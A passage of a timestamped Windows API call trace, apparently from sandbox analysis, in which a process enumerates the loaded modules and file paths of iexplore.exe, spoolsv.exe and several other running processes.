hProcess=0x218, hModule=0x7fef5320000, lpmodinfo=0x24c64b8, cb=0x18 | out: lpmodinfo=0x24c64b8*(lpBaseOfDll=0x7fef5320000, SizeOfImage=0x7f000, EntryPoint=0x7fef5321070)) returned 1 [0049.506] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef5320000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="imapi2.dll") returned 0xa [0049.519] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef5320000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll")) returned 0x1e [0049.531] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef52c0000, lpmodinfo=0x24c8678, cb=0x18 | out: lpmodinfo=0x24c8678*(lpBaseOfDll=0x7fef52c0000, SizeOfImage=0x55000, EntryPoint=0x7fef52c26e4)) returned 1 [0049.542] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef52c0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="hgcpl.dll") returned 0x9 [0049.552] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef52c0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll")) returned 0x1d [0049.566] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef5280000, lpmodinfo=0x24ca838, cb=0x18 | out: lpmodinfo=0x24ca838*(lpBaseOfDll=0x7fef5280000, SizeOfImage=0x31000, EntryPoint=0x7fef5281b24)) returned 1 [0049.578] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef5280000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="provsvc.dll") returned 0xb [0049.592] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef5280000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll")) returned 0x1f [0049.604] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef97b0000, lpmodinfo=0x24cc9f8, cb=0x18 | out: lpmodinfo=0x24cc9f8*(lpBaseOfDll=0x7fef97b0000, SizeOfImage=0x74000, EntryPoint=0x7fef97b66f0)) returned 1 [0049.617] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef97b0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="netprofm.dll") returned 0xc [0049.629] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef97b0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")) returned 0x20 [0049.641] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd680000, lpmodinfo=0x24cebc8, cb=0x18 | out: lpmodinfo=0x24cebc8*(lpBaseOfDll=0x7fefd680000, SizeOfImage=0x91000, EntryPoint=0x7fefd681440)) returned 1 [0049.656] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd680000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="SXS.DLL") returned 0x7 [0049.669] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd680000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SXS.DLL" (normalized: "c:\\windows\\system32\\sxs.dll")) returned 0x1b [0049.683] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef51a0000, lpmodinfo=0x24d0d78, cb=0x18 | out: lpmodinfo=0x24d0d78*(lpBaseOfDll=0x7fef51a0000, SizeOfImage=0xd7000, EntryPoint=0x7fef51a1254)) returned 1 [0049.695] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef51a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="fxsst.dll") returned 0x9 [0049.708] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef51a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\fxsst.dll" (normalized: "c:\\windows\\system32\\fxsst.dll")) returned 0x1d [0049.720] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef5100000, lpmodinfo=0x24d2f38, cb=0x18 | out: lpmodinfo=0x24d2f38*(lpBaseOfDll=0x7fef5100000, SizeOfImage=0x9d000, EntryPoint=0x7fef518d52c)) returned 1 [0049.733] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef5100000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="FXSAPI.dll") returned 0xa [0049.746] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef5100000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll")) returned 0x1e [0049.758] GetModuleInformation (in: hProcess=0x218, hModule=0x75450000, lpmodinfo=0x24d50f8, cb=0x18 | out: lpmodinfo=0x24d50f8*(lpBaseOfDll=0x75450000, SizeOfImage=0xe3000, EntryPoint=0x0)) returned 1 [0049.775] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75450000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="FXSRESM.DLL") returned 0xb [0049.795] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75450000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FXSRESM.DLL" (normalized: "c:\\windows\\system32\\fxsresm.dll")) returned 0x1f [0049.807] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7a30000, lpmodinfo=0x24d72d0, cb=0x18 | out: lpmodinfo=0x24d72d0*(lpBaseOfDll=0x7fef7a30000, SizeOfImage=0x28000, EntryPoint=0x7fef7a43cc4)) returned 1 [0049.819] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7a30000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="wscinterop.dll") returned 0xe [0049.832] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7a30000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll")) returned 0x22 [0049.845] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb180000, lpmodinfo=0x24d94a0, cb=0x18 | out: lpmodinfo=0x24d94a0*(lpBaseOfDll=0x7fefb180000, SizeOfImage=0x13000, EntryPoint=0x7fefb18a8b8)) returned 1 [0049.857] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb180000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="WSCAPI.dll") returned 0xa [0049.872] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb180000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WSCAPI.dll" (normalized: "c:\\windows\\system32\\wscapi.dll")) returned 0x1e [0049.885] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7910000, lpmodinfo=0x24db660, cb=0x18 | out: lpmodinfo=0x24db660*(lpBaseOfDll=0x7fef7910000, SizeOfImage=0x11f000, EntryPoint=0x7fef792339c)) returned 1 [0049.898] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7910000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="wscui.cpl") returned 0x9 [0049.911] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7910000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl")) returned 0x1d [0049.924] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb160000, lpmodinfo=0x24dd820, cb=0x18 | out: lpmodinfo=0x24dd820*(lpBaseOfDll=0x7fefb160000, SizeOfImage=0x18000, EntryPoint=0x7fefb161010)) returned 1 [0049.937] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb160000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="MPR.dll") returned 0x7 [0049.949] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb160000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MPR.dll" (normalized: "c:\\windows\\system32\\mpr.dll")) returned 0x1b [0049.962] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb150000, lpmodinfo=0x24df9d0, cb=0x18 | out: lpmodinfo=0x24df9d0*(lpBaseOfDll=0x7fefb150000, SizeOfImage=0xa000, EntryPoint=0x7fefb151198)) returned 1 [0049.975] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb150000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="drprov.dll") returned 0xa [0049.988] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb150000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll")) returned 0x1e [0050.002] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb120000, lpmodinfo=0x24e1b90, cb=0x18 | out: lpmodinfo=0x24e1b90*(lpBaseOfDll=0x7fefb120000, SizeOfImage=0x22000, EntryPoint=0x7fefb121198)) returned 1 [0050.015] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb120000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ntlanman.dll") returned 0xc [0050.027] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb120000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll")) returned 0x20 [0050.039] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb100000, lpmodinfo=0x24e3d60, cb=0x18 | out: lpmodinfo=0x24e3d60*(lpBaseOfDll=0x7fefb100000, SizeOfImage=0x1c000, EntryPoint=0x7fefb101198)) returned 1 [0050.049] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb100000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="davclnt.dll") returned 0xb [0050.059] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb100000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll")) returned 0x1f [0050.075] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb0f0000, lpmodinfo=0x24e5f20, cb=0x18 | out: lpmodinfo=0x24e5f20*(lpBaseOfDll=0x7fefb0f0000, SizeOfImage=0xa000, EntryPoint=0x7fefb0f4938)) returned 1 [0050.086] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb0f0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="DAVHLPR.dll") returned 0xb [0050.096] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb0f0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\DAVHLPR.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll")) returned 0x1f [0050.106] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef77d0000, lpmodinfo=0x24e80e0, cb=0x18 | out: lpmodinfo=0x24e80e0*(lpBaseOfDll=0x7fef77d0000, SizeOfImage=0x13c000, EntryPoint=0x7fef77d197c)) returned 1 [0050.117] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef77d0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="werconcpl.dll") returned 0xd [0050.127] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef77d0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll")) returned 0x21 [0050.137] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7780000, lpmodinfo=0x24ea2b0, cb=0x18 | out: lpmodinfo=0x24ea2b0*(lpBaseOfDll=0x7fef7780000, SizeOfImage=0x43000, EntryPoint=0x7fef77a1b50)) returned 1 [0050.148] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7780000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="framedynos.dll") returned 0xe [0050.158] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7780000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")) returned 0x22 [0050.169] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6f40000, lpmodinfo=0x24ec480, cb=0x18 | out: lpmodinfo=0x24ec480*(lpBaseOfDll=0x7fef6f40000, SizeOfImage=0x19000, EntryPoint=0x7fef6f5077c)) returned 1 [0050.179] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6f40000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="wercplsupport.dll") returned 0x11 [0050.189] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6f40000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll")) returned 0x25 [0050.199] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6f30000, lpmodinfo=0x24ee660, cb=0x18 | out: lpmodinfo=0x24ee660*(lpBaseOfDll=0x7fef6f30000, SizeOfImage=0xb000, EntryPoint=0x7fef6f35740)) returned 1 [0050.210] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6f30000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="hcproviders.dll") returned 0xf [0050.221] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6f30000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll")) returned 0x23 [0050.231] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6eb0000, lpmodinfo=0x24f0830, cb=0x18 | out: lpmodinfo=0x24f0830*(lpBaseOfDll=0x7fef6eb0000, SizeOfImage=0x73000, EntryPoint=0x7fef6f0c7f8)) returned 1 [0050.242] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6eb0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ieproxy.dll") returned 0xb [0050.252] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6eb0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll")) returned 0x2e [0050.263] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef32a0000, lpmodinfo=0x24f2a10, cb=0x18 | out: lpmodinfo=0x24f2a10*(lpBaseOfDll=0x7fef32a0000, SizeOfImage=0x1f000, EntryPoint=0x7fef32a57b8)) returned 1 [0050.273] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef32a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="thumbcache.dll") returned 0xe [0050.284] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef32a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll")) returned 0x22 [0050.295] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef2ff0000, lpmodinfo=0x24f4be0, cb=0x18 | out: lpmodinfo=0x24f4be0*(lpBaseOfDll=0x7fef2ff0000, SizeOfImage=0xd7000, EntryPoint=0x7fef2ff1074)) returned 1 [0050.306] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef2ff0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="SearchFolder.dll") returned 0x10 [0050.317] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef2ff0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll")) returned 0x24 [0050.327] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3260000, lpmodinfo=0x24f6dc0, cb=0x18 | out: lpmodinfo=0x24f6dc0*(lpBaseOfDll=0x7fef3260000, SizeOfImage=0x3b000, EntryPoint=0x7fef3261238)) returned 1 [0050.339] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3260000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="MLANG.dll") returned 0x9 [0050.350] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3260000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MLANG.dll" (normalized: "c:\\windows\\system32\\mlang.dll")) returned 0x1d [0050.360] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef26a0000, lpmodinfo=0x24f8f80, cb=0x18 | out: lpmodinfo=0x24f8f80*(lpBaseOfDll=0x7fef26a0000, SizeOfImage=0xc6000, EntryPoint=0x7fef26af220)) returned 1 [0050.371] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef26a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="MsftEdit.dll") returned 0xc [0050.382] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef26a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MsftEdit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll")) returned 0x20 [0050.394] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c4) returned 0x218 [0050.394] EnumProcessModules (in: hProcess=0x218, lphModule=0x24ff300, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24ff300, lpcbNeeded=0x41eb20) returned 1 [0050.394] GetModuleInformation (in: hProcess=0x218, hModule=0xf00000, lpmodinfo=0x24ff570, cb=0x18 | out: lpmodinfo=0x24ff570*(lpBaseOfDll=0xf00000, SizeOfImage=0xa6000, EntryPoint=0xf01c9a)) returned 1 [0050.394] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xf00000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="iexplore.exe") returned 0xc [0050.395] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xf00000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe")) returned 0x35 [0050.395] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25017a0, cb=0x18 | out: lpmodinfo=0x25017a0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0050.395] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0050.396] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0050.396] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2503960, cb=0x18 | out: lpmodinfo=0x2503960*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0050.397] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0050.397] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0050.397] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2505b20, cb=0x18 | out: lpmodinfo=0x2505b20*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0050.398] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0050.398] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0050.399] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2507cf0, cb=0x18 | out: lpmodinfo=0x2507cf0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0050.399] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0050.400] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0050.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb60) returned 0x218 [0050.401] EnumProcessModules (in: hProcess=0x218, lphModule=0x250a400, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x250a400, lpcbNeeded=0x41eb20) returned 1 [0050.401] GetModuleInformation (in: hProcess=0x218, hModule=0xcf0000, lpmodinfo=0x250a670, cb=0x18 | out: lpmodinfo=0x250a670*(lpBaseOfDll=0xcf0000, SizeOfImage=0x17000, EntryPoint=0xcf14a1)) returned 1 [0050.402] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xcf0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="fling.exe") returned 0x9 [0050.402] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xcf0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\fling.exe" (normalized: "c:\\program files (x86)\\internet explorer\\fling.exe")) returned 0x32 [0050.402] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x250c890, cb=0x18 | out: lpmodinfo=0x250c890*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0050.403] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0050.403] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0050.403] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x250ea50, cb=0x18 | out: lpmodinfo=0x250ea50*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0050.404] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0050.404] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0050.405] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2510c10, cb=0x18 | out: lpmodinfo=0x2510c10*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0050.405] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0050.406] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0050.406] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2512de0, cb=0x18 | out: lpmodinfo=0x2512de0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0050.407] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0050.407] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0050.408] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x910) returned 0x218 [0050.408] EnumProcessModules (in: hProcess=0x218, lphModule=0x2515508, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2515508, lpcbNeeded=0x41eb20) returned 1 [0050.409] GetModuleInformation (in: hProcess=0x218, hModule=0xc80000, lpmodinfo=0x2515778, cb=0x18 | out: lpmodinfo=0x2515778*(lpBaseOfDll=0xc80000, SizeOfImage=0x17000, EntryPoint=0xc814a1)) returned 1 [0050.409] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xc80000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="spcwin.exe") returned 0xa [0050.409] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xc80000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Mozilla Firefox\\spcwin.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\spcwin.exe")) returned 0x31 [0050.410] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2517998, cb=0x18 | out: lpmodinfo=0x2517998*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0050.410] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0050.410] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0050.411] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2519b58, cb=0x18 | out: lpmodinfo=0x2519b58*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0050.411] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0050.411] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0050.412] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x251bd18, cb=0x18 | out: lpmodinfo=0x251bd18*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0050.412] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0050.413] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0050.413] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x251dee8, cb=0x18 | out: lpmodinfo=0x251dee8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0050.414] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0050.414] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0050.415] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x470) returned 0x218 [0050.415] EnumProcessModules (in: hProcess=0x218, lphModule=0x25205f8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25205f8, lpcbNeeded=0x41eb20) returned 1 [0050.420] EnumProcessModules (in: hProcess=0x218, lphModule=0x2520810, cb=0x400, lpcbNeeded=0x41eb20 | out: lphModule=0x2520810, lpcbNeeded=0x41eb20) returned 1 [0050.424] GetModuleInformation (in: hProcess=0x218, hModule=0xff480000, lpmodinfo=0x2520c80, cb=0x18 | out: lpmodinfo=0x2520c80*(lpBaseOfDll=0xff480000, SizeOfImage=0x8c000, EntryPoint=0xff48f1e0)) returned 1 [0050.424] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff480000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="spoolsv.exe") returned 0xb [0050.425] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff480000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\spoolsv.exe" (normalized: "c:\\windows\\system32\\spoolsv.exe")) returned 0x1f [0050.425] 